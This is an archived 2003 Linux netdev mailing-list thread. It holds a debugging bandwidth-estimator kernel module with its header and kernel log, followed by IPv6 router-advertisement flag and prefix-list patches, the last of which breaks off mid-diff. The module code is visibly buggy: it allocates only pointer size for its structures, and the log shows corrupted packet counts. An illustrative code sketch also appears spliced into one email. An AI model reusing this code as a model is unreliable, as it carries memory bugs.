Borrowed from iproute2 package (tc/tc_estimator.c) * Following values were obtained by running the estimator for 1 sec * interval and 8 sec time constant of iproute2 package.
*/ interval = 1000000; /* 1 sec */ time_const = 8000000; /* 8 sec */ idx = 2; ewma_log = 3; /** Could this be true due to previous errors */ if(bwusage_head != NULL) { printk(KERN_INFO "bwestimator: bwusage_head is not NULL\n"); return -1; } bwusage_head = NULL; current_bwusage = NULL; /** Lock the dev_base */ read_lock(&dev_base_lock); /** Lock the bwusage_head */ write_lock(&bwusage_head_lock); for(dev = dev_base; dev != NULL; dev = dev -> next) { struct bwusage *bwusage = kmalloc(sizeof(bwusage), GFP_KERNEL); if(bwusage == NULL) { /** Free allocated memory */ for(bwusage = bwusage_head; bwusage;) { struct bwusage *u = bwusage -> next; kfree(bwusage); bwusage = u; } /** Unlock the bwusage_head */ write_unlock(&bwusage_head_lock); /** Unlock the dev_base */ read_unlock(&dev_base_lock); /** Return error */ return -ENOBUFS; } bwusage -> next = NULL; dev_hold(dev); bwusage -> name = dev -> name; __dev_put(dev); bwusage -> rx_bps = 0; bwusage -> rx_avbps = 0; bwusage -> rx_pps = 0; bwusage -> rx_avpps = 0; bwusage -> rx_bytes = 0; bwusage -> rx_packets = 0; bwusage -> tx_bps = 0; bwusage -> tx_avbps = 0; bwusage -> tx_pps = 0; bwusage -> tx_avpps = 0; bwusage -> tx_bytes = 0; bwusage -> tx_packets = 0; if(bwusage_head == NULL) { bwusage_head = bwusage; } else { current_bwusage -> next = bwusage; } current_bwusage = bwusage; printk(KERN_INFO "bwestimator: Adding %s device (%s), rx_bytes, %lu, rx_packets, %lu, rx_bps, %lu, rx_avbps, %lu, rx_pps, %lu, rx_avpps, %lu\n", dev->name, bwusage -> name, bwusage -> rx_bytes, bwusage -> rx_packets, bwusage -> rx_bps, bwusage -> rx_avbps, bwusage -> rx_pps, bwusage -> rx_avpps); } /** Initialize and setup the timer */ init_timer(&estimator_timer); estimator_timer.function = check_bandwidth; value = 0; estimator_timer.data = (unsigned long) &value; estimator_timer.expires = jiffies + HZ; /* One second */ add_timer(&estimator_timer); /** Unlock the bwusage_head */ write_unlock(&bwusage_head_lock); /** Unlock the dev_base */ 
	read_unlock(&dev_base_lock);

	printk("<1>bwestimator: Starting bandwidth usage estimation\n");
	return 0;
}

/**
 * cleanup_module: Module cleanup function
 */
void cleanup_module()
{
	struct bwusage *current_bwusage;
	unsigned long flags;

	/** Lock the bwusage_head */
	write_lock(&bwusage_head_lock);

	/** Delete the timer */
	del_timer(&estimator_timer);

	/** Free allocated memory */
	for(current_bwusage = bwusage_head; current_bwusage;) {
		struct bwusage *u = current_bwusage -> next;
		printk(KERN_INFO "bwestimator: Deleting %s device\n", current_bwusage -> name ? current_bwusage -> name : "null");
		kfree(current_bwusage);
		current_bwusage = u;
	}
	bwusage_head = NULL;

	/** Unlock the bwusage_head */
	write_unlock(&bwusage_head_lock);

	printk("<1>bwestimator: Stopping bandwidth usage estimation\n");
}

/**
 * check_bandwidth(): Checks the bandwidth usage on interfaces
 */
void check_bandwidth(unsigned long ptr)
{
	struct net_device *dev;
	struct bwusage *bwusage;
	unsigned long *data = (unsigned long *) ptr;
	unsigned long nbytes, old_nbytes;
	unsigned long npackets, old_npackets;
	unsigned long rate;
	/** Count to print the debug message */
	static unsigned count = 0;
	unsigned long flags;

	/** Read lock the dev_base */
	read_lock(&dev_base_lock);
	/** Read lock the bwusage_head */
	write_lock(&bwusage_head_lock);

	if(count >= 5) {
		/** Unlock the bwusage_head */
		write_unlock(&bwusage_head_lock);
		/** Unlock the dev_base */
		read_unlock(&dev_base_lock);
		return;
	}

	for(dev = dev_base, bwusage = bwusage_head; dev != NULL && bwusage != NULL; dev = dev -> next, bwusage = bwusage -> next) {
		struct net_device_stats *stats;

		dev_hold(dev);
		stats = (dev -> get_stats ?
			 dev -> get_stats(dev) : (struct net_device_stats *)NULL);
		if(stats) {
#if 0
			nbytes = stats -> tx_bytes;
			npackets = stats -> tx_packets;

			/** Tx_bps */
			rate = (nbytes - bwusage -> tx_bytes) << (7 - idx);
			bwusage -> tx_bytes = nbytes;
			bwusage -> tx_avbps += ((long)rate - (long)bwusage ->tx_avbps) >> ewma_log;
			bwusage -> tx_bps = (bwusage -> tx_avbps + 0xF) >> 5;

			/** Tx_pps */
			rate = (u32) ((npackets - bwusage -> tx_packets) << (12 - idx));
			bwusage -> tx_packets = npackets;
			bwusage -> tx_avpps = (u32) (bwusage -> tx_avpps + (((long)rate - (long)bwusage ->tx_avpps) >> ewma_log));
			bwusage -> tx_pps = (u32) ((bwusage -> tx_avpps + 0x1FF) >> 10);

			/** Rx_bps */
			nbytes = stats -> rx_bytes;
			npackets = stats -> rx_packets;
			old_nbytes = bwusage -> rx_bytes;
			old_npackets = bwusage -> rx_packets;
			rate = (nbytes - bwusage -> rx_bytes) << (7 - idx);
			bwusage -> rx_bytes = nbytes;
			bwusage -> rx_avbps += ((long)rate - (long)bwusage ->rx_avbps) >> ewma_log;
			bwusage -> rx_bps = (bwusage -> rx_avbps + 0xF) >> 5;
			printk(KERN_INFO "bwestimator: device, %s, nbytes, %lu, npackets, %lu, old_nbytes, %lu, old_npackets, %lu, rate, %lu, rx_avbps, %lu, rx_bps, %lu, idx, %d, ewma_log, %d\n", dev -> name, nbytes, npackets, old_nbytes, old_npackets, rate, bwusage -> rx_avbps, bwusage -> rx_bps, idx, ewma_log);

			/** Rx_pps */
			rate = (u32) ((npackets - bwusage -> rx_packets) << (12 - idx));
			bwusage -> rx_packets = npackets;
			bwusage -> rx_avpps = (u32) (bwusage -> rx_avpps + (((long)rate - (long)bwusage ->rx_avpps) >> ewma_log));
			bwusage -> rx_pps = (u32) ((bwusage -> rx_avpps + 0x1FF) >> 10);
			/*
			printk(KERN_INFO "bwestimator: Device, %6s, nbytes, %llu, npackets, %lu, rxbps, %lu, rxpps, %lu, txbps, %lu, txpps, %lu\n", bwusage->name, nbytes, npackets, bwusage->rx_bps, bwusage->rx_pps, bwusage->tx_bps, bwusage->tx_pps );
			*/
#endif
		} else {
			printk(KERN_INFO "bwestimator: Device: %6s. 
No statistics available.\n", dev->name);
		}
		__dev_put(dev);
	}

	mod_timer(&estimator_timer, jiffies + HZ);
	printk(KERN_INFO "bwestimator: dev: %s. bwusage: %s.\n", dev ? "non-null" : "null", bwusage ? "non-null" : "null");
	count++;

	/** Unlock the bwusage_head */
	write_unlock(&bwusage_head_lock);
	/** Unlock the dev_base */
	read_unlock(&dev_base_lock);
	return;
}

MODULE_LICENSE("GPL");

--------------Boundary-00=_I5B1Z16K2MEMVO8EMDU8
Content-Type: text/x-chdr; charset="us-ascii"; name="bwestimator.h"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="bwestimator.h"

#include
#include
#include
#include
#include
#include

/** Timer */
//extern struct timer_list estimator_timer;

/** We assume that the list of devices in dev_base does not change and
 * hence once the list of usage is built for each device, we assume that
 * there is a one-to-one correspondence in the list of devices and the
 * list of usage structures.
 */

/** Usage structure list */
struct bwusage {
	struct bwusage *next;
	char *name;
	unsigned long rx_bps;
	unsigned long rx_avbps;
	unsigned long rx_pps;
	unsigned long rx_avpps;
	unsigned long rx_bytes;
	unsigned long rx_total_bytes;
	unsigned long rx_packets;
	unsigned long rx_total_packets;
	unsigned long tx_bps;
	unsigned long tx_avbps;
	unsigned long tx_pps;
	unsigned long tx_avpps;
	unsigned long tx_bytes;
	unsigned long tx_total_bytes;
	unsigned long tx_packets;
	unsigned long tx_total_packets;
};

extern struct bwusage *bwusage_head;

/** bwusage_head lock */
extern rwlock_t bwusage_head_lock;

--------------Boundary-00=_I5B1Z16K2MEMVO8EMDU8
Content-Type: text/x-log; charset="us-ascii"; name="messages.log"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="messages.log"

Jul 14 16:23:55 elans-pc kernel: bwestimator: Adding lo device (lo), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:23:55 elans-pc kernel: bwestimator: Adding eth0 device (eth0), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 
0, rx_pps, 0, rx_avpps, 0
Jul 14 16:23:55 elans-pc kernel: bwestimator: Adding eth1 device (eth1), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:23:55 elans-pc kernel: bwestimator: Adding eth2 device (eth2), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:23:55 elans-pc kernel: bwestimator: Adding eth3 device (eth3), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:23:55 elans-pc kernel: bwestimator: Adding eth4 device (eth4), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:23:55 elans-pc kernel: bwestimator: Adding eth5 device (eth5), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:23:55 elans-pc kernel: bwestimator: Starting bandwidth usage estimation
Jul 14 16:23:56 elans-pc kernel: bwestimator: dev: null. bwusage: null.
Jul 14 16:24:00 elans-pc last message repeated 4 times
Jul 14 16:24:01 elans-pc kernel: bwestimator: Deleting lo device
Jul 14 16:24:01 elans-pc kernel: bwestimator: Deleting eth0 device
Jul 14 16:24:01 elans-pc kernel: bwestimator: Deleting eth1 device
Jul 14 16:24:01 elans-pc kernel: bwestimator: Deleting eth2 device
Jul 14 16:24:01 elans-pc kernel: bwestimator: Deleting eth3 device
Jul 14 16:24:01 elans-pc kernel: bwestimator: Deleting eth4 device
Jul 14 16:24:01 elans-pc kernel: bwestimator: Deleting eth5 device
Jul 14 16:24:01 elans-pc kernel: bwestimator: Stopping bandwidth usage estimation
Jul 14 16:24:05 elans-pc kernel: bwestimator: Adding lo device (lo), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:24:05 elans-pc kernel: bwestimator: Adding eth0 device (eth0), rx_bytes, 0, rx_packets, 3433504032, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:24:05 elans-pc kernel: bwestimator: Adding eth1 device (eth1), rx_bytes, 0, rx_packets, 3433504000, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:24:05 
elans-pc kernel: bwestimator: Adding eth2 device (eth2), rx_bytes, 0, rx_packets, 3433503968, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:24:05 elans-pc kernel: bwestimator: Adding eth3 device (eth3), rx_bytes, 0, rx_packets, 3433503936, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:24:05 elans-pc kernel: bwestimator: Adding eth4 device (eth4), rx_bytes, 0, rx_packets, 3433503904, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:24:05 elans-pc kernel: bwestimator: Adding eth5 device (eth5), rx_bytes, 0, rx_packets, 3433503872, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:24:05 elans-pc kernel: bwestimator: Starting bandwidth usage estimation
Jul 14 16:24:06 elans-pc kernel: bwestimator: dev: non-null. bwusage: null.
Jul 14 16:24:10 elans-pc last message repeated 4 times
Jul 14 16:24:19 elans-pc kernel: bwestimator: Deleting lo device
Jul 14 16:24:19 elans-pc kernel: bwestimator: Stopping bandwidth usage estimation
Jul 14 16:24:22 elans-pc kernel: bwestimator: Adding lo device (lo), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:24:22 elans-pc kernel: bwestimator: Adding eth0 device (eth0), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:24:22 elans-pc kernel: bwestimator: Adding eth1 device (eth1), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:24:22 elans-pc kernel: bwestimator: Adding eth2 device (eth2), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:24:22 elans-pc kernel: bwestimator: Adding eth3 device (eth3), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:24:22 elans-pc kernel: bwestimator: Adding eth4 device (eth4), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:24:22 elans-pc kernel: bwestimator: Adding eth5 device (eth5), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, 
rx_avpps, 0
Jul 14 16:24:22 elans-pc kernel: bwestimator: Starting bandwidth usage estimation
Jul 14 16:24:23 elans-pc kernel: bwestimator: dev: null. bwusage: null.
Jul 14 16:24:27 elans-pc last message repeated 4 times
Jul 14 16:24:30 elans-pc kernel: bwestimator: Deleting lo device
Jul 14 16:24:30 elans-pc kernel: bwestimator: Deleting eth0 device
Jul 14 16:24:30 elans-pc kernel: bwestimator: Deleting eth1 device
Jul 14 16:24:30 elans-pc kernel: bwestimator: Deleting eth2 device
Jul 14 16:24:30 elans-pc kernel: bwestimator: Deleting eth3 device
Jul 14 16:24:30 elans-pc kernel: bwestimator: Deleting eth4 device
Jul 14 16:24:30 elans-pc kernel: bwestimator: Deleting eth5 device
Jul 14 16:24:30 elans-pc kernel: bwestimator: Stopping bandwidth usage estimation
Jul 14 16:24:35 elans-pc kernel: bwestimator: Adding lo device (lo), rx_bytes, 0, rx_packets, 0, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:24:35 elans-pc kernel: bwestimator: Adding eth0 device (eth0), rx_bytes, 0, rx_packets, 3433504224, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:24:35 elans-pc kernel: bwestimator: Adding eth1 device (eth1), rx_bytes, 0, rx_packets, 3433504192, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:24:35 elans-pc kernel: bwestimator: Adding eth2 device (eth2), rx_bytes, 0, rx_packets, 3433504160, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:24:35 elans-pc kernel: bwestimator: Adding eth3 device (eth3), rx_bytes, 0, rx_packets, 3433504128, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:24:35 elans-pc kernel: bwestimator: Adding eth4 device (eth4), rx_bytes, 0, rx_packets, 3433504096, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:24:35 elans-pc kernel: bwestimator: Adding eth5 device (eth5), rx_bytes, 0, rx_packets, 3433504064, rx_bps, 0, rx_avbps, 0, rx_pps, 0, rx_avpps, 0
Jul 14 16:24:35 elans-pc kernel: bwestimator: Starting bandwidth usage estimation
Jul 14 16:24:36 elans-pc kernel: bwestimator: dev: non-null. 
bwusage: null.
Jul 14 16:24:40 elans-pc last message repeated 4 times
Jul 14 16:24:40 elans-pc kernel: bwestimator: Deleting lo device
Jul 14 16:24:40 elans-pc kernel: bwestimator: Stopping bandwidth usage estimation

--------------Boundary-00=_I5B1Z16K2MEMVO8EMDU8--

From krkumar@us.ibm.com Mon Jul 14 15:37:37 2003
Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 15:37:47 -0700 (PDT)
Received: from e6.ny.us.ibm.com (e6.ny.us.ibm.com [32.97.182.106]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6EMbXFl013709 for ; Mon, 14 Jul 2003 15:37:36 -0700
Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e6.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6EMahkh192752; Mon, 14 Jul 2003 18:36:43 -0400
Received: from DYN318430.beaverton.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6EMaecB125234; Mon, 14 Jul 2003 18:36:41 -0400
Date: Mon, 14 Jul 2003 15:35:15 -0700 (PDT)
From: Krishna Kumar
X-X-Sender: krkumar@DYN318430.beaverton.ibm.com
To: yoshfuji@linux-ipv6.org
cc: davem@redhat.com, , , ,
Subject: [PATCH 1/4] Prefix List against 2.5.73
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-archive-position: 4022
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: krkumar@us.ibm.com
Precedence: bulk
X-list: netdev

I am sending the latest patches against 2.5.73 and 2.4.21 with the changes
mentioned in my previous mail. I have also split the patch by functionality:
the prefix list and the O/M flags of an RA. The bottom of this mail contains
the patch for setting/getting the O/M flags against 2.5.73. The next three
mails contain the prefix list patch against 2.5.73, and both of these
patches against 2.4.21. Please apply the O/M flags patch before the prefix
list patch.

Thanks,

- KK

---------------------------------------------------------------------------

> You do not explain why we (or kernel) NEED(s) this.
> It is not so important how SMALL it is
> though it may cause problems how LARGE it is.

I explained the reasons for having a prefix list interface in my previous
mail. To recap:

- Users don't need to know what the definition of a prefix is; all they
  have to do is ask the kernel and get the list. Otherwise, different user
  apps will have to know the definition of a prefix and parse the entries
  themselves. The parsing is non-trivial (e.g. the address should not be
  LL or MC, there should be no nexthop, it should have been added via an
  RA, etc.).
- The kernel code to get the prefix list is small: the top-level
  inet6_dump_fib uses either dump_node or dump_prefix, the latter being
  the new user interface. Having a user interface makes it easier to get
  the prefix list without significant bloat to the kernel.

> This is design issue; how we should provide L3 per-interface
> information to userspace; eg. in_device and/or inet6_dev things
> including per-interface statistics.
>
> Since I think it is not appropriate to provide per-interface
> statistics via RTM_xxxROUTE, so I don't agree to provide
> the RA information (i.e. Manage/Otherconf Flags) via
> RTM_xxxROUTE.
>
> Options:
> - use RTM_xxxLINK for L3 operation
> - introduce RTM_xxxIFACE for L3 per-interface operations

Yes, there are a couple of different ways to do this. One is as you have
suggested, but there is a problem with it: the existing RTM_GETLINK
interface returns very generic elements of the dev (mtu, hardware address,
dev statistics), while the change you suggested is specific to IPv6. I am
not sure that this is a good design to implement. We could either keep the
current (submitted) way or use a different RTM_GETADDR interface in
inet6_fill_ifaddr (and introduce RTM_IFACEFLAGS). This will be specific to
IPv6. Are you agreeable to this?

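For illustration only, here is a minimal sketch of how the two RA bits under discussion can be folded into, and read back from, a per-interface flags word. It assumes the IF_RA_* values from the if_inet6.h hunk of the O/M flags patch in this mail and mirrors the expression that patch adds to ndisc.c. The helper names (ra_update_flags, ra_wants_managed, ra_wants_otherconf, ra_flags_example) are hypothetical and are not part of the patch; how the flags word reaches user space is left out, since that is exactly the open design question.

```c
#include <assert.h>

/* Flag values as defined in the if_inet6.h hunk of the O/M flags patch. */
#define IF_RA_OTHERCONF 0x80
#define IF_RA_MANAGED   0x40
#define IF_RA_RCVD      0x20
#define IF_RS_SENT      0x10

/*
 * Hypothetical helper (not in the patch): replace the M/O bits in if_flags
 * with the values carried by the most recently received RA, leaving every
 * other bit untouched. This mirrors the expression added to ndisc.c.
 */
int ra_update_flags(int if_flags, int managed, int other)
{
	return (if_flags & ~(IF_RA_MANAGED | IF_RA_OTHERCONF)) |
	       (managed ? IF_RA_MANAGED : 0) |
	       (other ? IF_RA_OTHERCONF : 0);
}

/* Hypothetical user-space predicates on the exported flags word. */
int ra_wants_managed(int if_flags)
{
	return (if_flags & IF_RA_MANAGED) != 0;
}

int ra_wants_otherconf(int if_flags)
{
	return (if_flags & IF_RA_OTHERCONF) != 0;
}

/* Usage sketch: two RAs arrive in sequence on the same interface. */
int ra_flags_example(void)
{
	int flags = IF_RS_SENT | IF_RA_RCVD;

	flags = ra_update_flags(flags, 1, 1);	/* first RA: M=1, O=1 */
	assert(ra_wants_managed(flags) && ra_wants_otherconf(flags));

	flags = ra_update_flags(flags, 0, 1);	/* later RA: M=0, O=1 */
	assert(!ra_wants_managed(flags) && ra_wants_otherconf(flags));

	return flags;	/* IF_RS_SENT | IF_RA_RCVD | IF_RA_OTHERCONF */
}
```

Because the update clears both bits before setting them, the flags word always reflects the latest RA only, so whichever interface ends up exporting it, a consumer only has to test two bits.
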
> Well, on moving forward; you can split your patch up to 3 things: > 1. fix routing flags > 2. provide Managed/Otherconf flags API > (3. provide the prefix list API (if it IS required)) > > I'm not against the first item. > We need to discuss on the design related to the 2nd item. > I don't think that we really need 3rd item. - I am ok with 1 :-) - I have suggested changes for 2, please let me know what you think, whether we can go with the old way or make the change suggested above. - I believe we need #3 for the reasons given above. Thanks, - KK ----------------------- PATCH for O/M against 2.5.73 -------------------- diff -ruN linux-2.5.73.org/include/linux/rtnetlink.h PATCHES/linux-2.5.73/include/linux/rtnetlink.h --- linux-2.5.73.org/include/linux/rtnetlink.h 2003-06-22 11:33:07.000000000 -0700 +++ PATCHES/linux-2.5.73/include/linux/rtnetlink.h 2003-07-14 12:11:51.000000000 -0700 @@ -330,6 +330,7 @@ IFA_LABEL, IFA_BROADCAST, IFA_ANYCAST, + IFA_IFFLAGS, IFA_CACHEINFO }; diff -ruN linux-2.5.73.org/include/net/if_inet6.h PATCHES/linux-2.5.73/include/net/if_inet6.h --- linux-2.5.73.org/include/net/if_inet6.h 2003-06-22 11:33:32.000000000 -0700 +++ PATCHES/linux-2.5.73/include/net/if_inet6.h 2003-07-14 10:30:59.000000000 -0700 @@ -17,6 +17,8 @@ #include +#define IF_RA_OTHERCONF 0x80 +#define IF_RA_MANAGED 0x40 #define IF_RA_RCVD 0x20 #define IF_RS_SENT 0x10 diff -ruN linux-2.5.73.org/net/ipv6/addrconf.c PATCHES/linux-2.5.73/net/ipv6/addrconf.c --- linux-2.5.73.org/net/ipv6/addrconf.c 2003-06-22 11:33:17.000000000 -0700 +++ PATCHES/linux-2.5.73/net/ipv6/addrconf.c 2003-07-14 12:22:07.000000000 -0700 @@ -2359,6 +2359,7 @@ static int inet6_fill_ifaddr(struct sk_buff *skb, struct inet6_ifaddr *ifa, u32 pid, u32 seq, int event) { + int flags; struct ifaddrmsg *ifm; struct nlmsghdr *nlh; struct ifa_cacheinfo ci; @@ -2389,6 +2390,8 @@ } RTA_PUT(skb, IFA_CACHEINFO, sizeof(ci), &ci); } + flags = ifa->idev->if_flags; + RTA_PUT(skb, IFA_IFFLAGS, sizeof(flags), &flags); 
nlh->nlmsg_len = skb->tail - b; return skb->len; diff -ruN linux-2.5.73.org/net/ipv6/ndisc.c PATCHES/linux-2.5.73/net/ipv6/ndisc.c --- linux-2.5.73.org/net/ipv6/ndisc.c 2003-06-22 11:32:56.000000000 -0700 +++ PATCHES/linux-2.5.73/net/ipv6/ndisc.c 2003-07-14 10:30:59.000000000 -0700 @@ -1036,6 +1036,16 @@ */ in6_dev->if_flags |= IF_RA_RCVD; } + /* + * Remember the managed/otherconf flags from most recently + * receieved RA message (RFC 2462) -- yoshfuji + */ + in6_dev->if_flags = (in6_dev->if_flags & ~(IF_RA_MANAGED| + IF_RA_OTHERCONF)) | + (ra_msg->icmph.icmp6_addrconf_managed ? + IF_RA_MANAGED : 0) | + (ra_msg->icmph.icmp6_addrconf_other ? + IF_RA_OTHERCONF : 0); lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime); ------------------------------------------------------------------------ From krkumar@us.ibm.com Mon Jul 14 15:41:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 15:41:34 -0700 (PDT) Received: from e34.co.us.ibm.com (e34.co.us.ibm.com [32.97.110.132]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6EMfTFl014058 for ; Mon, 14 Jul 2003 15:41:30 -0700 Received: from westrelay02.boulder.ibm.com (westrelay02.boulder.ibm.com [9.17.195.11]) by e34.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6EMedEh260732; Mon, 14 Jul 2003 18:40:39 -0400 Received: from DYN318430.beaverton.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay02.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6EMeZbU080426; Mon, 14 Jul 2003 16:40:36 -0600 Date: Mon, 14 Jul 2003 15:39:13 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: yoshfuji@linux-ipv6.org cc: davem@redhat.com, , , , Subject: [PATCH 2/4] O/M flags against 2.4.21 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4023 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev [ Sorry, PATCH 1/4 is a patch for 
O/M flags against 2.5.73, the subject was wrong.] ------------------- PATCH for O/M flags against 2.4.21 ------------------ diff -ruN linux-2.4.21.org/include/linux/rtnetlink.h PATCHES/linux-2.4.21/include/linux/rtnetlink.h --- linux-2.4.21.org/include/linux/rtnetlink.h 2002-11-28 15:53:15.000000000 -0800 +++ PATCHES/linux-2.4.21/include/linux/rtnetlink.h 2003-07-14 12:32:49.000000000 -0700 @@ -307,6 +307,7 @@ IFA_LABEL, IFA_BROADCAST, IFA_ANYCAST, + IFA_IFFLAGS, IFA_CACHEINFO }; diff -ruN linux-2.4.21.org/include/net/if_inet6.h PATCHES/linux-2.4.21/include/net/if_inet6.h --- linux-2.4.21.org/include/net/if_inet6.h 2003-06-13 07:51:39.000000000 -0700 +++ PATCHES/linux-2.4.21/include/net/if_inet6.h 2003-07-14 10:30:53.000000000 -0700 @@ -15,6 +15,8 @@ #ifndef _NET_IF_INET6_H #define _NET_IF_INET6_H +#define IF_RA_OTHERCONF 0x80 +#define IF_RA_MANAGED 0x40 #define IF_RA_RCVD 0x20 #define IF_RS_SENT 0x10 diff -ruN linux-2.4.21.org/net/ipv6/addrconf.c PATCHES/linux-2.4.21/net/ipv6/addrconf.c --- linux-2.4.21.org/net/ipv6/addrconf.c 2003-06-13 07:51:39.000000000 -0700 +++ PATCHES/linux-2.4.21/net/ipv6/addrconf.c 2003-07-14 12:21:50.000000000 -0700 @@ -1879,6 +1879,7 @@ static int inet6_fill_ifaddr(struct sk_buff *skb, struct inet6_ifaddr *ifa, u32 pid, u32 seq, int event) { + int flags; struct ifaddrmsg *ifm; struct nlmsghdr *nlh; struct ifa_cacheinfo ci; @@ -1909,6 +1910,8 @@ } RTA_PUT(skb, IFA_CACHEINFO, sizeof(ci), &ci); } + flags = ifa->idev->if_flags; + RTA_PUT(skb, IFA_IFFLAGS, sizeof(flags), &flags); nlh->nlmsg_len = skb->tail - b; return skb->len; diff -ruN linux-2.4.21.org/net/ipv6/ndisc.c PATCHES/linux-2.4.21/net/ipv6/ndisc.c --- linux-2.4.21.org/net/ipv6/ndisc.c 2003-06-13 07:51:39.000000000 -0700 +++ PATCHES/linux-2.4.21/net/ipv6/ndisc.c 2003-07-14 10:30:53.000000000 -0700 @@ -940,6 +940,16 @@ */ in6_dev->if_flags |= IF_RA_RCVD; } + /* + * Remember the managed/otherconf flags from most recently + * receieved RA message (RFC 2462) -- yoshfuji + */ + 
in6_dev->if_flags = (in6_dev->if_flags & ~(IF_RA_MANAGED| + IF_RA_OTHERCONF)) | + (ra_msg->icmph.icmp6_addrconf_managed ? + IF_RA_MANAGED : 0) | + (ra_msg->icmph.icmp6_addrconf_other ? + IF_RA_OTHERCONF : 0); lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime); ------------------------------------------------------------------------ From krkumar@us.ibm.com Mon Jul 14 15:43:45 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 15:43:52 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6EMhiFl014401 for ; Mon, 14 Jul 2003 15:43:45 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e1.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6EMgrKb218730; Mon, 14 Jul 2003 18:42:53 -0400 Received: from DYN318430.beaverton.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6EMgpcB138578; Mon, 14 Jul 2003 18:42:52 -0400 Date: Mon, 14 Jul 2003 15:41:26 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: yoshfuji@linux-ipv6.org cc: davem@redhat.com, , , , Subject: [PATCH 3/4] Prefix List against 2.5.73 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4024 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev --------------- Prefix List against 2.5.73 --------------------------- diff -ruN linux-2.5.73.org/include/linux/ipv6_route.h PATCHES/linux-2.5.73/include/linux/ipv6_route.h --- linux-2.5.73.org/include/linux/ipv6_route.h 2003-06-22 11:32:36.000000000 -0700 +++ PATCHES/linux-2.5.73/include/linux/ipv6_route.h 